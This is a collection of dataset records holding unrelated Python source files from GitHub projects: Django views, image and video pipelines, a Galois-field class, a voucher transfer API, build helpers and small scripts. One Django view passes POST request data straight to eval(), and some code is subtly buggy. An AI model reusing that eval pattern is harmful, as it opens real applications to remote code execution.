{HOST}:{PORT}\")\n httpd.serve_forever()","repo_name":"ivan-gerov/kobo_books_server","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19949170707","text":"from django.views.generic import CreateView, ListView, UpdateView, DeleteView\nfrom .models import Language\nfrom django.urls import reverse_lazy\n\n\nclass LanguageCreateView(CreateView):\n model =Language\n template_name = 'language/create.html'\n fields = ('name', )\n success_url =reverse_lazy('Qfxcinema:movie-list')\n\n def get_context_data(self, **kwargs):\n context = super(LanguageCreateView, self).get_context_data(**kwargs)\n context['language'] = 'this is for language'\n return context\n\nclass LanguageListView(ListView):\n\tmodel = Language\n\ttemplate_name = 'language/create.html'\n\tcontext_object_name = 'Languages'\n\n\nclass LanguageUpdateView(UpdateView):\n\tmodel = Language\n\ttemplate_name = 'language/update.html'\n\tfields = '__all__'\n\tsuccess_url = reverse_lazy('Qfxcinema:language-list')\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(LanguageUpdateView, self).get_context_data(**kwargs)\n\t\tcontext['language']= 'this is for update'\n\t\treturn context\n\nclass LanguageDeleteView(DeleteView):\n\tmodel = Language\n\tsuccess_url = reverse_lazy('Qfxcinema:language_list')\n\n\tdef get(self, request, *args, **kwargs):\n\t\tself.post(self, request, *args, **kwargs)","repo_name":"ghanshyamneupane/first-project","sub_path":"Qfxcinema/language_views.py","file_name":"language_views.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36151495323","text":"\"\"\"\nDescription : 해당 폴더에 라벨링 되어있지 않은 모든 이미지 파일을 삭제한다\"\n Labeling : (1.jpg + 1.txt), (2.png + 2.txt)\n No Labeling : (1.jpg), (2.jpg)\nUsage : python delete_no_label_file.py --folder=\"./coco/images/train/\"\n\n\"\"\"\nimport argparse\nimport os\nimport sys\n \ndef file_delete(path):\n files = os.listdir(path)\n img_file_list = []\n\n # 파일의 개수\n print('file count : ', len(files))\n\n # 모든 이미지 파일을 리스트에 넣는다 \n for _file in files:\n name, ext = _file.split('.')\n\n if ext == \"jpg\" or ext == \"jpeg\" or ext == \"png\" or ext == \"gif\":\n img_file_list.append(name)\n # files.remove(_file)\n \n # 리스트에 있는 이미지 파일 중에서 .txt파일도 같이 가지고 있으면 리스트에서 삭제한다\n for _file in files:\n name, ext = _file.split('.')\n\n if ext == \"txt\":\n if name in img_file_list:\n img_file_list.remove(name)\n\n #리스트에 남아 있는 파일 삭제\n for name in img_file_list:\n if os.path.isfile(path+name+\".jpg\"):\n print(name)\n os.remove(path+name+\".jpg\")\n elif os.path.isfile(path+name+\".jpeg\"):\n print(name)\n os.remove(path+name+\".jpeg\")\n elif os.path.isfile(path+name+\".png\"):\n print(name)\n os.remove(path+name+\".png\")\n elif os.path.isfile(path+name+\".gif\"):\n print(name)\n os.remove(path+name+\".gif\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--folder\", type=str,\n help=\"Source Folder\") \n \n args = parser.parse_args()\n file_delete(args.folder)","repo_name":"AhnJG/AI-Project","sub_path":"Object_Detection/YOLO-V3-Train/delete_no_label_file.py","file_name":"delete_no_label_file.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9737871466","text":"from django.views.generic import View\n\nfrom django.http import JsonResponse\n\n# from subs import producter\nfrom sendmail import Mail\n\n\nclass Sub(View):\n def post(self, request, types):\n data = request.POST.get('data', None)\n tatil = '''各位好:\\n本次发布内容为\\n项目 镜像 tag\\n'''\n for i in eval(data):\n print(i.get('tag'))\n print(i.get('image'))\n context = i.get('project') + \" \" + i.get(\"image\") + \" \" + i.get('tag') + \"\\n\"\n tatil += context\n m = Mail(content=tatil)\n if m.send():\n return JsonResponse({\"code\": 0})\n else:\n return JsonResponse({\"code\": 4})\n","repo_name":"x82423990/operation-platform","sub_path":"subs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9258645404","text":"import math\nimport sys\n\nclass GF:\n\n def __init__(self, prime, poly):\n self.prime = prime\n self.mod_poly = poly\n self.dimension = len(self.mod_poly) - 1\n self.q = int(math.pow(self.prime, self.dimension))\n self.exp_2_pol = []\n self.pol_2_exp = [0]*self.q\n self.pol_2_exp[0] = -1*sys.maxint\n self.zero_exp = -1*sys.maxint\n for i in range(1, self.q):\n pol = [0]*i\n pol.pop()\n pol.append(1)\n poly = self.divide_poly(pol)\n ind = 0\n for j in range(len(poly)):\n ind += poly[j]*(self.prime**j)\n self.pol_2_exp[ind] = i - 1\n self.exp_2_pol.append(poly)\n\n def divide_poly(self, poly):\n if len(poly) >= len(self.mod_poly):\n mul_index = len(poly) - len(self.mod_poly)\n prod = []\n for i in range(mul_index):\n prod.append(0)\n for i in range(mul_index, len(self.mod_poly) + mul_index):\n prod.append(\n (self.mod_poly[i - mul_index]*poly[-1]) % self.prime)\n bal = self.sub_poly(poly, prod)\n return self.divide_poly(bal) \n else:\n return poly\n\n def mul_exp(self, exp1, exp2):\n if exp1 == self.zero_exp:\n return exp2\n elif exp2 == self.zero_exp:\n return exp1\n else:\n return ((exp1 + exp2) % (self.q - 1))\n\n def pol_2_indx(self, poly):\n ind = 0\n for i in range(len(poly)):\n ind += poly[i]*(self.prime**i)\n return ind\n\n def mul_poly(self, poly1, poly2):\n ind1 = self.pol_2_indx(poly1)\n ind2 = self.pol_2_indx(poly2)\n exp1 = self.pol_2_exp[ind1]\n exp2 = self.pol_2_exp[ind2]\n return self.exp_2_pol[self.mul_exp(exp1, exp2)]\n\n def div_poly(self, poly1, poly2):\n ind0 = 0\n for i in range(len(poly1)):\n ind0 += poly1[i]*(self.prime**i)\n ind1 = 0\n for i in range(len(poly2)):\n ind1 += poly2[i]*(self.prime**i)\n return self.exp_2_pol[self.div_exp(ind0, ind1)]\n\n def div_exp(self, exp1, exp2):\n inv_exp2 = m_inv_exp(self, exp2)\n return self.mul_exp(exp1, inv_exp2)\n\n def m_inv_exp(self, exp):\n return (self.q - 1) - (exp % self.q - 1)\n\n def add_exp(self, exp1, exp2):\n if exp1 == -1*sys.maxint:\n pol1 = []\n else:\n pol1 = self.exp_2_pol[exp1]\n if exp2 == -1*sys.maxint:\n pol2 = []\n else:\n pol2 = self.exp_2_pol[exp2]\n _sum = self.add_poly(pol1, pol2)\n ind = self.pol_2_indx(_sum)\n return self.pol_2_exp[ind]\n\n def sub_poly(self, poly1, poly2):\n inv_poly2 = self.a_inv_poly(poly2)\n return self.add_poly(poly1, inv_poly2)\n\n def add_poly(self, poly1, poly2):\n if len(poly1) >= len(poly2):\n _sum = []\n for i in range(len(poly2)):\n _sum.append((poly1[i] + poly2[i]) % self.prime)\n for i in range(len(poly2), len(poly1)):\n _sum.append(poly1[i])\n if len(_sum) == 0:\n return _sum\n while(_sum[-1] == 0):\n _sum.pop()\n if len(_sum) == 0:\n break\n return _sum\n else:\n return self.add_poly(poly2, poly1)\n\n def a_inv_poly(self, poly):\n inv = []\n for i in range(len(poly)):\n inv.append((self.prime - poly[i]) % self.prime)\n return inv\n\n def a_inv_exp(self, exp):\n poly = self.exp_2_pol[exp]\n inv = self.a_inv_poly(poly)\n ind = self.pol_2_indx(inv)\n return self.pol_2_exp[ind]\n\n def rs_gen_poly(self, rho):\n gen_poly = [self.a_inv_exp(1), 0]\n comp = 1\n while comp < rho - 2:\n gen_poly = self.rs_gen_add_degree(gen_poly)\n comp += 1\n return gen_poly\n\n def rs_gen_add_degree(self, pol):\n new_degree = len(pol)\n new_gen = []\n g_0 = self.mul_exp(self.a_inv_exp(new_degree), pol[0])\n new_gen.append(g_0)\n new_comp = self.a_inv_exp(new_degree)\n for i in range(1, new_degree):\n _prdct = self.mul_exp(pol[i], new_comp)\n _sum = self.add_exp(_prdct, pol[i-1])\n new_gen.append(_sum)\n new_gen.append(0)\n return new_gen\n","repo_name":"manuts/gr-ldpc","sub_path":"apps/gf.py","file_name":"gf.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"72303268354","text":"import cv2,numpy as np\nimport files\n\nclass Pipeline(object):\n def __init__(self,transforms):\n self.transforms=transforms\n\n def __call__(self,frame_i):\n frame_i=self.transforms[0](frame_i)\n for transform_j in self.transforms[1:]:\n frame_i=transform_j(frame_i)\n return frame_i\n\ndef transform(in_path,out_path,frame_fun,single_frame=False):\n if(type(frame_fun)==list):\n frame_fun=Pipeline(frame_fun)\n files.make_dir(out_path)\n print(in_path)\n for in_i in files.top_files(in_path):\n out_i=out_path+'/'+in_i.split('/')[-1]\n print(out_i)\n frames=read_frames(in_i)\n if(single_frame):\n new_frames=[frame_fun(frame_j) for frame_j in frames]\n else:\n new_frames=frame_fun(frames)\n save_frames(out_i,new_frames)\n\ndef seq_tranform(frame_fun,img_seqs):\n return { name_i:[frame_fun(frame_j) for frame_j in seq_i]\n for name_i,seq_i in img_seqs.items()}\n\ndef read_seqs(in_path):\n seqs={}\n for seq_path_i in files.top_files(in_path):\n frames=read_frames(seq_path_i)\n name_i=seq_path_i.split('/')[-1]\n print(name_i)\n seqs[name_i]=frames\n return seqs \n\ndef save_seqs(seq_dict,out_path):\n files.make_dir(out_path)\n for name_i,seq_i in seq_dict.items():\n seq_path_i=out_path+'/'+name_i\n save_frames(seq_path_i,seq_i)\n\ndef read_frames(seq_path_i):\n if(seq_path_i.split(\".\")[-1]==\"npy\"):\n return np.load(seq_path_i)\n return [ cv2.imread(frame_path_j, cv2.IMREAD_GRAYSCALE)\n for frame_path_j in files.top_files(seq_path_i)]\n\ndef save_frames(seq_path_i,seq_i):\n files.make_dir(seq_path_i)\n for j,frame_j in enumerate(seq_i): \n frame_name_j=seq_path_i+'/'+str(j)+\".png\"\n cv2.imwrite(frame_name_j,frame_j)\n\ndef concat(in_path1,in_path2,out_path):\n seq1,seq2=read_seqs(in_path1),read_seqs(in_path2)\n names=seq1.keys()\n concat_seqs={}\n for name_i in names:\n seq1_i,seq2_i=seq1[name_i],seq2[name_i]\n seq_len=min(len(seq1_i),len(seq2_i))\n seq1_i,seq2_i= seq1_i[:seq_len],seq2_i[:seq_len]\n new_seq_i=np.concatenate( [seq1_i,seq2_i],axis=1)\n concat_seqs[name_i]=new_seq_i\n save_seqs(concat_seqs,out_path)","repo_name":"tjacek/res_ensemble","sub_path":"imgs.py","file_name":"imgs.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23968843089","text":"import json\nfrom decimal import Decimal\n\nimport requests\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.utils import timezone\nfrom rest_framework.exceptions import PermissionDenied, APIException\n\nfrom ducatus_voucher.vouchers.models import Voucher\nfrom ducatus_voucher.transfers.models import Transfer\nfrom ducatus_voucher.litecoin_rpc import DucatuscoreInterface, DucatuscoreInterfaceException\nfrom ducatus_voucher.consts import DECIMALS\nfrom ducatus_voucher.settings import RATES_API_URL\n\n\ndef validate_voucher(activation_code):\n try:\n voucher = Voucher.objects.get(activation_code=activation_code)\n except ObjectDoesNotExist:\n raise PermissionDenied(detail='Invalid activation code')\n\n if not voucher.is_active:\n raise PermissionDenied(detail='This voucher is not active')\n\n if voucher.is_used:\n raise PermissionDenied(detail='This voucher already used')\n\n return voucher\n\n\ndef make_voucher_transfer(voucher, duc_address):\n duc_amount = convert_usd2duc(usd_amount=voucher.usd_amount)\n transfer = Transfer(voucher=voucher, duc_amount=duc_amount, duc_address=duc_address)\n transfer.save()\n\n try:\n rpc = DucatuscoreInterface()\n tx_hash = rpc.node_transfer(duc_address, duc_amount)\n transfer.tx_hash = tx_hash\n transfer.transfer_status = 'WAITING_FOR_CONFIRM'\n transfer.save()\n print(f'VOUCHER ACTIVATION: successful transfer {transfer.tx_hash} to {transfer.duc_address} '\n f'for {transfer.duc_amount} DUC', flush=True)\n except DucatuscoreInterfaceException as err:\n transfer.transfer_status = 'ERROR'\n transfer.save()\n print(f'VOUCHER ACTIVATION: failed transfer {transfer.duc_amount} DUC to {transfer.duc_address} '\n f'with exception {str(err)}', flush=True)\n raise APIException(detail=str(err))\n\n voucher.is_used = True\n voucher.activation_date = timezone.now()\n voucher.save()\n\n return transfer\n\n\ndef send_dividends(duc_address, duc_amount):\n transfer = Transfer(duc_amount=duc_amount, duc_address=duc_address)\n transfer.save()\n\n try:\n rpc = DucatuscoreInterface()\n tx_hash = rpc.node_transfer(duc_address, duc_amount)\n except DucatuscoreInterfaceException as err:\n transfer.transfer_status = 'ERROR'\n transfer.save()\n raise APIException(detail=str(err))\n\n transfer.tx_hash = tx_hash\n transfer.transfer_status = 'WAITING_FOR_CONFIRM'\n transfer.tag = 'dividends'\n transfer.save()\n\n return transfer\n\n\ndef confirm_transfer(message):\n tx_hash = message.get('txHash')\n transfer = Transfer.objects.get(tx_hash=tx_hash)\n transfer.transfer_status = 'CONFIRMED'\n transfer.save()\n\n if transfer.voucher.payment_id or transfer.voucher.charge_id:\n transfer.voucher.register_in_lottery(transfer)\n\n\ndef convert_usd2duc(usd_amount):\n duc_usd_rate = json.loads(requests.get(RATES_API_URL.format(fsym='DUC', tsyms='USD')).content).get('USD')\n duc_amount = Decimal(str(usd_amount / duc_usd_rate)) * DECIMALS['DUC']\n return duc_amount\n","repo_name":"DucatusX/ducatus_voucher_backend","sub_path":"ducatus_voucher/transfers/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38753992371","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"All *basic* python related details\"\nimport itertools\nimport subprocess\nfrom pathlib import Path\nfrom waflib.Configure import conf\nfrom waflib.Context import Context\nfrom ._requirements import REQ as requirements\nfrom ._utils import copyfiles\n\n@requirements.addcheck\ndef check_julia(cnf, name, version):\n \"checks pylint's astroid version\"\n requirements.programversion(cnf, 'julia', version, reg = name)\n\nclass JuliaLint:\n \"\"\"\n Sets up a server for linting julia files\n \"\"\"\n def __init__(self, fname = str(Path(__file__).parent/\"_julialint.jl\")):\n self.cnt = itertools.count()\n self.file = fname\n self.server = None\n\n def lint(self, bld, src = None):\n \"runs the lint on the file\"\n if src is None:\n src = bld.path.ant_glob('**/*.jl')\n\n if len(src) == 0:\n return\n\n if self.server is None:\n self.server = subprocess.Popen([\"julia\", self.file],\n stdout = subprocess.DEVNULL,\n stderr = subprocess.DEVNULL)\n for inp in src:\n grp = f'julia_{next(self.cnt)}'\n bld.add_group(grp, move = False)\n bld(source = [inp],\n color = 'BLUE',\n rule = f'julia {self.file} ${{SRC}}',\n group = grp,\n cls_keyword = lambda _: 'Julia')\n\nJLINT = JuliaLint()\n\n@conf\ndef build_julia(bld:Context, name:str, _:str, **_2):\n \"builds a python module\"\n if 'julia' not in requirements:\n return\n\n copyfiles(bld, name, bld.path.ant_glob(\"**/*.jl\"))\n #JLINT.lint(bld)\n","repo_name":"depixusgenome/wafbuilder","sub_path":"_julia.py","file_name":"_julia.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40337312924","text":"from dexy.exceptions import InternalDexyProblem\nfrom dexy.exceptions import UserFeedback\nfrom dexy.filters.process import SubprocessExtToFormatFilter\nimport os\n\nclass Asciidoctor(SubprocessExtToFormatFilter):\n \"\"\"\n Runs `asciidoctor`.\n \"\"\"\n aliases = ['asciidoctor']\n _settings = {\n 'tags' : ['asciidoc', 'html'],\n 'examples' : ['asciidoctor'],\n 'output' : True,\n 'version-command' : \"asciidoctor --version\",\n 'executable' : 'asciidoctor',\n 'input-extensions' : ['.*'],\n 'output-extensions': ['.html', '.xml', '.tex'],\n 'stylesheet' : (\"Custom asciidoctor stylesheet to use.\", None),\n 'format-specifier': '-b ',\n 'backend' : (\"Asciidoctor backend to use (optional, only to override default).\", None),\n 'ext-to-format' : {\n '.html' : 'html5',\n '.xml': 'docbook5',\n '.tex' : 'latex'\n },\n 'command-string': '%(prog)s %(format)s %(args)s %(ss)s -o %(output_file)s %(script_file)s'\n }\n\n def command_string_args(self):\n args = super(Asciidoctor, self).command_string_args()\n\n stylesheet = self.setting('stylesheet')\n if stylesheet is not None:\n stylesdir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'asciidoctor'))\n\n if not os.path.exists(stylesdir):\n msg = \"Asciidoctor stylesheet directory not found at '%s'\"\n raise InternalDexyProblem(msg % stylesdir)\n\n args['ss'] = \"-a stylesheet=%s -a stylesdir=%s\" % (stylesheet, stylesdir)\n\n if not os.path.exists(os.path.join(stylesdir, stylesheet)):\n msg = \"No stylesheet file named '%s' was found in directory '%s'. Files found: %s\"\n stylesheets = os.listdir(stylesdir)\n raise UserFeedback(msg % (stylesheet, stylesdir, \", \".join(stylesheets)))\n\n else:\n args['ss'] = ''\n\n backend = self.setting('backend')\n if backend is not None:\n format_specifier = self.setting('format-specifier')\n args['format'] = \"%s%s\" % (format_specifier, backend)\n\n return args\n","repo_name":"dexy/dexy","sub_path":"dexy/filters/asciidoctor.py","file_name":"asciidoctor.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":308,"dataset":"github-code","pt":"61"} +{"seq_id":"27001468323","text":"import cv2\nimport random\n\nimg = cv2.imread('Tutorials/Assets/image.jpeg')\n\n# when an image is loaded it imports the pixels and imputs them into a numpy array\n# the term shape tells me the number of rows, number of columns, and the number of channels (colour space BGR)\nprint(img.shape)\n\n# accessing pixel values\n# this indexes the first row then the pixels from the 45th to 100th place in the first row\nprint(img[0][45:100])\n\nprint(img[0][100]) # looks at the first row 100th place\n\n\n# modifying an image\n# the code below works via the first loop picking the 1st row then goes through all the coloums and assigns random BGR values\nfor i in range(int(img.shape[0]/4)): # loops from 0 to 100\n for j in range(img.shape[1]): # here we are looking at the columns (width)\n img[i][j] = [random.randint(0, 255), random.randint(\n 0, 255), random.randint(0, 255)] # 3 random values for BGR\ncv2.imshow('Image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"thefluffyorange/OpenCV","sub_path":"Tutorials/Tutorial_02.py","file_name":"Tutorial_02.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72199598595","text":"#!/usr/bin/env python\n\nimport scrollphathd\n\nimport threading\nimport logging\n\n\n\nPREFIX_OFFSET = 1\nSCROLL_PAGE_SIZE = 3\nROTATED = 180\nALL_UPPERCASE = False\nINITIAL_DELAY = 3.0\nPOST_DELAY = 1.0\n\nclass AutoScroll():\n _is_enabled = False\n _interval = 0.05\n _items = []\n _current = None\n _currentIndexCountdown = 0\n _overflow_length = 0\n\n def AutoScroll(self, interval=0.05):\n self._interval = interval\n\n def startstop(self):\n if self._is_enabled is False:\n logging.info(\"Starting Autoscroll\")\n self._is_enabled = True\n # if ROTATED != 0:\n logging.info(\"Autoscroll rotated {}\".format(ROTATED))\n scrollphathd.rotate(degrees=ROTATED)\n self.run()\n else:\n self._is_enabled = False\n\n def append(self, msg):\n logging.info(\"Autoscroll append\")\n self._items.insert(0, msg + (\" \" * 3))\n \n def clear(self):\n self._items.clear()\n\n def run(self):\n if self._is_enabled is False:\n return\n \n next_interval = self._interval\n\n if self._currentIndexCountdown < 0:\n\n if len(self._items) > 0:\n upcoming = self._items.pop()\n if ALL_UPPERCASE:\n upcoming = upcoming.upper()\n\n scrollphathd.clear()\n scrollphathd.write_string(upcoming, x=PREFIX_OFFSET, y=0, font=None, letter_spacing=1, brightness=0.2, monospaced=False, fill_background=False)\n scrollphathd.show()\n\n shape = scrollphathd.get_shape()\n buffer_shape = scrollphathd.get_buffer_shape()\n self._overflow_length = buffer_shape[0] - shape[0]\n logging.info(\"Autoscroll.run: Decreasing index countdown: {} ({} - {})\".format(str(self._overflow_length), shape[0], buffer_shape[0]))\n self._currentIndexCountdown = self._overflow_length\n\n next_interval = INITIAL_DELAY # inital delay\n else:\n logging.info(\"Autoscroll.run: No items to pop..\")\n # self.demo()\n \n else:\n logging.info(\"Autoscroll.run: Just scrolling..\")\n\n # Scroll the buffer content\n scrollphathd.scroll(x=SCROLL_PAGE_SIZE)\n # Show the buffer\n scrollphathd.show()\n\n self._currentIndexCountdown -= SCROLL_PAGE_SIZE\n\n # Start a timer\n threading.Timer(next_interval, self.run).start()\n\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n\n scrollphathd.set_clear_on_exit(True)\n autoscroll = AutoScroll()\n autoscroll.startstop()\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"ingvirafn/raspberrypi-scroller","sub_path":"autoscroller.py","file_name":"autoscroller.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7991284059","text":"\"\"\"\nАрифметическая прогрессия\nЧисло m , чтобы получилась сумма k + (k+1) .... + (k+m-1) = n\n\"\"\"\n\ndef leftbinsearch(left, right, checkfunc, params):\n while left < right:\n mid = (left + right) // 2\n if checkfunc(mid, params):\n right = mid\n else:\n left = mid + 1\n return left\n\ndef checkcount(days, params):\n n, k = params\n return (2 * k + days - 1) * days // 2 >= n\n\nnodays = leftbinsearch(0, 200, checkcount, (200, 10))\nprint(nodays)\n","repo_name":"ivangotovets/algorithms","sub_path":"_Бинарный поиск/6-сумма арифм прогрессии.py","file_name":"6-сумма арифм прогрессии.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72170339075","text":"from utils import *\nimport classifier\nfrom sklearn.externals import joblib\nfrom datetime import datetime\nfrom cars import Cars\nfrom skimage.io import imsave\nfrom scipy import misc\nfrom moviepy.editor import ImageSequenceClip\n\n\ndef pipeline(image, cars, model, frame_num, heat_map='n'):\n \"\"\"\n Take video frame as input. Implements sliding window search for cars, draws\n bounding boxes on the frame and returns the new frame.\n\n import glob\n import matplotlib.image as mpimg\n import matplotlib.pyplot as plt\n sample_images = glob.glob('./data/test_images/*.jpg',recursive=True)\n image = mpimg.imread(sample_images[0])\n cars = Cars()\n frame_num = 0\n pipeline(image, cars, model, 0, heat_map='y')\n\n :param image: Frame capture of the video\n :param cars: Cars Object to track location of cars from frame to frame\n :return: Frame with bounded boxes\n \"\"\"\n\n boxes = get_boxes() # Generate box coordinates for sliding window search\n locations = [] # list to track locations of cars\n car_num = 0\n count = 0\n for box in reversed(boxes):\n section = image[box[1]:box[3],box[0]:box[2],:]\n section = misc.imresize(section, (64, 64, 3))\n features = classifier.extract_features([section])\n #print(np.mean(features),np.std(features),np.max(features),np.min(features))\n is_car = model.predict(features)\n\n if is_car:\n locations.append(box)\n car_num += 1\n count += 1\n\n #if count > 15:\n # break\n print(\"Cars: \", car_num, \"No cars:\",count-car_num)\n current_data = cars.add_locations(frame_num, locations)\n image = draw_boxes_info(image, current_data)\n\n if heat_map is 'y':\n heat_map = current_data[\"heat_map\"]\n image_with_heatmap = draw_heat_map(image, heat_map)\n return image, heat_map, image_with_heatmap\n\n\n timestamp = str(\n datetime.now().strftime('%Y_%m_%d_%H_%M_%S_%f')[:-3])\n imsave((output_images_folder_heatmaps + \"frame-{0}-{1}.jpg\").format(timestamp, frame_num),\n current_data[\"heat_map\"])\n return image\n\nif __name__ == \"__main__\":\n project_video_output = './data/videos/project_video_output.mp4'\n project_video = \"./data/videos/project_video.mp4\"\n output_images_folder = \"./data/videos/output_images/\"\n output_images_folder_heatmaps = \"./data/videos/heatmaps/\"\n\n vidcap = cv2.VideoCapture(project_video)\n success, image = vidcap.read()\n frame_num = 1\n cars = Cars() # create the car object\n model = joblib.load('./models/grid-0.965-1.pkl') # load trained linear SVC from a .pkl file\n\n clean_output_folder(output_images_folder_heatmaps)\n clean_output_folder(output_images_folder) # deleted previous transformed images stored in the output folder\n\n while frame_num < 250:\n #print('Frame Number: ', frame_num) # Print out frame number\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)/255\n\n # Call to main pipeline\n image = pipeline(image, cars, model, frame_num)\n\n timestamp = str(\n datetime.now().strftime('%Y_%m_%d_%H_%M_%S_%f')[:-3]) # save with timestamp and frame number as file name\n\n imsave((output_images_folder + \"frame-{0}-{1}.jpg\").format(timestamp, frame_num), image) # save frame as a JPEG file\n frame_num += 1 # Track frame number\n\n success, image = vidcap.read()\n\n # Read all written images and save as a video\n write_video(project_video_output, output_images_folder)\n","repo_name":"k-sandhu/Car-ND-Project5","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22422160405","text":"import json\n\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom rest_framework.test import APIClient\n\nfrom .constants import TEST_EMAIL\nfrom .constants import TEST_FIRSTNAME\nfrom .constants import TEST_LASTNAME\n\n\nclass TestAuthenticate(TestCase):\n AUTHENTICATE_URL = reverse(\"authenticate\")\n FIRST_NAME = TEST_FIRSTNAME\n LAST_NAME = TEST_LASTNAME\n EMAIL = TEST_EMAIL\n\n def setUp(self):\n self.client = APIClient()\n\n def test_create_user_and_login(\n self,\n first_name=FIRST_NAME,\n last_name=LAST_NAME,\n email=EMAIL,\n ):\n \"\"\"Checks if user is successfully created and auth token is returned.\"\"\"\n data = {\n \"sub\": \"googleID\",\n \"given_name\": first_name,\n \"family_name\": last_name,\n \"email\": email,\n }\n response = self.client.post(self.AUTHENTICATE_URL, data)\n self.assertEqual(response.status_code, 201)\n token = json.loads(response.content)[\"access_token\"]\n self.assertIsNotNone(token)\n","repo_name":"cuappdev/scoop-backend","sub_path":"src/api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"2155966650","text":"from Credentials import *\nimport requests\nimport json\n\ndef getCredentials() :\n\t\n\tcreds = dict()\n\tcreds['access_token'] = ACCESS_TOKEN\n\tcreds['client_id'] = CLIENT_ID \n\tcreds['client_secret'] = CLIENT_SECRET \n\tcreds['graph_domain'] = 'https://graph.facebook.com/' \n\tcreds['graph_version'] = 'v7.0' \n\tcreds['endpoint_base'] = creds['graph_domain'] + creds['graph_version'] + '/' \n\tcreds['debug'] = 'no'\n\tcreds['page_id'] = PAGE_ID\n\tcreds['instagram_account_id'] = INSTAGRAM_ACCOUNT_ID \n\tcreds['ig_username'] = IG_USERNAME \n\tprint(creds)\n\treturn creds\n\ndef callAPI( url, endpointParams, debug = 'no' ):\n\tdata = requests.get( url, endpointParams )\n\tresponse = dict() \n\tresponse['url'] = url \n\tresponse['endpoint_params'] = endpointParams \n\tresponse['endpoint_params_pretty'] = json.dumps( endpointParams, indent = 5) \n\tresponse['json_data'] = json.loads( data.content ) \n\tresponse['json_data_pretty'] = json.dumps( response['json_data'], indent = 5 ) \n\n\tif (debug=='yes') : \n\t\tdisplayData( response ) \n\n\treturn response \n\ndef displayData( response ) :\n\tprint (\"\\nURL: \" )# title\n\tprint (response['url']) # display url hit\n\tprint (\"\\nEndpoint Params: \") # title\n\tprint (response['endpoint_params_pretty']) # display params passed to the endpoint\n\tprint (\"\\nResponse: \") # title\n\tprint (response['json_data_pretty']) # make look pretty for cli","repo_name":"devaki9/NLP","sub_path":"func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31434814414","text":"from google_images_download import google_images_download \nresponse = google_images_download.googleimagesdownload() \n\n# Set the Dwonload meta data\nlistKey = ['sofa', \n 'mattress',\n 'bed',\n 'table',\n 'Broken toilet',\n 'Gravel block',\n 'Broken brick',\n 'Waste mortar',\n 'refrigerator',\n 'washing machine',\n 'air conditioning',\n 'TV set',\n 'Mobile phone',\n 'Laptop',\n 'Rice cooker']\n\n#Start downloading\nfor item in listKey:\n print(item)\n #arguments = {\"keywords\":item,\"limit\":2,\"px\":\"proxyhk.huawei.com:8080\"}\n arguments = {\"keywords\":item,\"limit\":200,\"chromedriver\":\"C:\\Chromdriver\\chromedriver.exe\",\"output_directory\":\"./Misc garbage\"}\n response.download(arguments)\n\n","repo_name":"robbynie/GarbageClassification","sub_path":"GarbageClassification/爬虫_&_Tag/download_images - Misc.py","file_name":"download_images - Misc.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43467082134","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 20 14:47:10 2021\r\n\r\n@author: USER\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import matthews_corrcoef\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.metrics import f1_score\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import cross_val_score\r\nimport statistics\r\nfrom sklearn import svm\r\n#################################################################################################################################\r\n## 